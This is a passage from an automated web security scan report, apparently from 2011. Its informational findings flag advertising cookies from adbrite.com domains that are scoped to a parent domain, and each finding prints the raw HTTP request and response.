rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csN4X%2B1RRbboRM1jdIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRimxOS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:38 GMT
Set-Cookie: ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csO45ntUkS06sa9idIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:09:38 GMT
Content-Length: 0


16.15. http://ads.adbrite.com/adserver/vdi/682865

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjkKBjY4NDMzORijmeS6DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUKMAoGNzYyNzAxGJL7-s0TIiA0OTUyNkIxQjNGREQwM0ZCQzE0RERDNTAwODlCQzg1MAohCgY3NzkwNDUYp4v6zRMiETE3NjA4ODQzOTEzMTMyNTM0CjQKBjgwNjIwNRj10Pi3GCIkMzcyOGU3NGMtNzQ2MS0xMWUwLTkxODUtMDAyNTkwMDlhOWU0EAE; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx"; rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRjqq-S6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Set-Cookie: rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Content-Length: 0


16.16. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjkKBjY4NDMzORjps8q7DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.17. http://ads.adbrite.com/adserver/vdi/711384

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:04:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a.triggit.com/pxabcm?abid=MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBjlpurNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:04:56 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:04:56 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:04:56 GMT
Content-Length: 0


16.18. http://ads.adbrite.com/adserver/vdi/762701

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.19. http://ads.adbrite.com/adserver/vdi/779045

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CiEKBjc3OTA0NRjjmuLOEyIRMTc2MDg4NDM5MTMxMzI1MzQQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Set-Cookie: rb=0:779045:20861280:17608843913132534:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.20. http://ads.adbrite.com/adserver/vdi/806205

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:39:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://d.chango.com/m/s/AdBrite?partner_uid=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY7bvluBgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Set-Cookie: rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Content-Length: 0


16.21. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794248&zs=3330305f323530&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRCd87L6CRi9rqrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EL3WyKMKGL2uqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:25 GMT
Set-Cookie: vsd=0@4@4dbe1561@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:25 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqld%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:25 GMT
Content-Length: 3164

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...

16.22. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

